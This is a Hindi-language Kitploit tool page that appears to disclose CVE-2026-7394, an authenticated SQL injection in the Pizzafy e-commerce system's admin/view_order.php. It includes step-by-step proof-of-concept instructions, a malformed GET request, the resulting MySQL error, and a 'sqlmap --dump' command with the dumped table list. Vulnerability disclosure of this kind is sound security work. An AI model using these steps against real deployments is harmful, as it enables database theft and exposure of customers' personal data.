Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-7394-SQLI | Kitploit
उपकरण/GitHubGitHub/xmyronn/cve-2026-7394-sqli
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubxmyronn/cve-2026-7394-sqli

CVE-2026-7394-SQLI

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Pizzafy ई-कॉमर्स सिस्टम में SQL इंजेक्शन — admin/view_order.php

विवरण

फ़ील्डमान
विक्रेताSourceCodester
उत्पादPHP और MySQL का उपयोग करने वाला Pizzafy ई-कॉमर्स सिस्टम
संस्करण1.0
भेद्यताSQL इंजेक्शन
CWECWE-89
CVSSv3 स्कोर7.2 (उच्च)
हमला वेक्टरनेटवर्क
प्रमाणीकरण आवश्यकहाँ (व्यवस्थापक)
शोधकर्ताXmyronn
दिनांक2026-04-11

https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html


प्रभावित घटक

फ़ाइल: Pizzafy/admin/view_order.php
पैरामीटर: id (GET)


विवरण

Pizzafy ई-कॉमर्स सिस्टम 1.0 में admin/view_order.php एंडपॉइंट, id GET पैरामीटर को MySQL क्वेरी में भेजने से पहले उसे ठीक से सैनिटाइज़ नहीं करता है। एक प्रमाणित व्यवस्थापक इस पैरामीटर में हेरफेर करके मनमाना SQL इंजेक्ट कर सकता है, जिससे पूर्ण डेटाबेस से समझौता हो सकता है।


प्रमाण की अवधारणा (PoC)

चरण 1 — व्यवस्थापक के रूप में लॉगिन करें

यहाँ जाएँ:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php

व्यवस्थापक क्रेडेंशियल से लॉगिन करें।

चरण 2 — ऑर्डर पर जाएँ

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
Screenshot 2026-04-11 212106

किसी भी ऑर्डर प्रविष्टि पर View Order पर क्लिक करें। Screenshot 2026-04-11 212116

चरण 3 — Burp Suite में अनुरोध इंटरसेप्ट करें

इंटरसेप्ट किया गया GET अनुरोध इस प्रकार दिखता है: Screenshot 2026-04-11 212135

चरण 4 — SQL त्रुटि ट्रिगर करें

id=1 को id=' में बदलें: Screenshot 2026-04-11 212145

root@kitploit:~
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1

प्रतिक्रिया — MySQL त्रुटि उजागर हुई:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15

चरण 5 — sqlmap के साथ शोषण करें

अनुरोध को view_order.txt में सहेजें और चलाएँ:

root@kitploit:~
sqlmap -r view_order.txt --dump --batch
Screenshot 2026-04-11 212406

sqlmap द्वारा पुष्टि किए गए इंजेक्शन प्रकार:

प्रकारशीर्षक
Boolean-based blindAND boolean-based blind — WHERE clause
Error-basedMySQL >= 5.0 FLOOR error-based
Time-based blindMySQL >= 5.0.12 SLEEP
UNION queryGeneric UNION query — 11 columns

पूर्ण डेटाबेस डंप किया गया:

root@kitploit:~
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings

उजागर हुई संवेदनशील डेटा में bcrypt पासवर्ड हैश, ग्राहक ईमेल, ऑर्डर विवरण और सिस्टम कॉन्फ़िगरेशन शामिल हैं।


प्रभाव

एक दुर्भावनापूर्ण प्रमाणित व्यवस्थापक (या वह हमलावर जिसने व्यवस्थापक क्रेडेंशियल प्राप्त कर लिए हैं) निम्न कार्य कर सकता है:

  • पासवर्ड हैश सहित पूर्ण डेटाबेस डंप करना
  • संवेदनशील ग्राहक PII (नाम, ईमेल, पते, फ़ोन नंबर) पढ़ना
  • संभावित रूप से डेटाबेस में लिखना

संदर्भ

  • SourceCodester — Pizzafy Ecommerce System
  • CWE-89: SQL कमांड में प्रयुक्त विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन।
टूल डाउनलोड करें